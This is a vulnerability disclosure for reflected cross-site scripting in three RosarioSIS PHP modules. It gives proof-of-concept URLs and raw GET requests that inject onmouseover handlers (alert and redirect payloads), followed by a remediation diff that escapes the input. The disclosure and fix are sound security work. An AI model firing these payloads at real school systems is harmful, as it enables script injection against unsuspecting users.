Reflected Cross-Site Scripting in different locations
Reflected Cross-Site Scripting vulnerability in Preferences.php, PrintSchedules.php, and Search.inc.php in RosarioSIS Student Information System < 6.7.2 allows remote attackers to execute arbitrary javascript via embedding javascript in the 'tab', 'include_inactive', and 'advanced' parameters in a GET request.
Plugin | README |
---|---|
Vulnerability type: | Cross-Site Scripting vulnerability (XSS) |
Vendor of the product(s): | RosarioSIS |
Affected product(s)/code base: | Tested on version 6.7.2 |
Has vendor confirmed or acknowledged the vulnerability: | Yes |
Attack type: | Reflected XSS |
Impact & Description: | C:L/I:L/A:N |
Affected component: | modules/Users/Preferences.php, modules/Scheduling/PrintSchedules.php, and modules/Users/Search.inc.php |
Attack vector(s): | Remote |
Proof of concept (PoC): | Details below |
Reference(s): | #291 (closed) |
CVSS v3.1 details: | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
PoC links:
# e1
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com`
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1"onmouseover%3d"alert(`xss`)
# Full redirect injection PoC
GET /Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com` HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: RosarioSIS=<Cookie>
"include_inactive" in modules/Scheduling/PrintSchedules.php has the same issue.
PoC links:
# e1
http://RosarioSIS.edu//Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22alert(1)%22style%3d%22
# Full redirect injection PoC
GET/Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22 HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0
"advanced" in modules/Users/Search.inc.php has the same issue.
PoC links:
# e1
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1%22onmouseover%3d%22alert(`xfr`)%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`"
# Full redirect injection PoC
GET /Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`" HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0
Remediation example:
root@bd410a977728:/usr/src/rosariosis# diff ./modules/Users/Preferences.php ./modules/Users/Preferences.php.bk
126,128c126,127
< $ttt = $_REQUEST['tab'];
< $ttt = htmlspecialchars(strip_tags($ttt));
< echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&tab=' . $ttt . '" method="POST">';
---
>
> echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&tab=' . $_REQUEST['tab'] . '" method="POST">';
root@bd410a977728:/usr/src/rosariosis#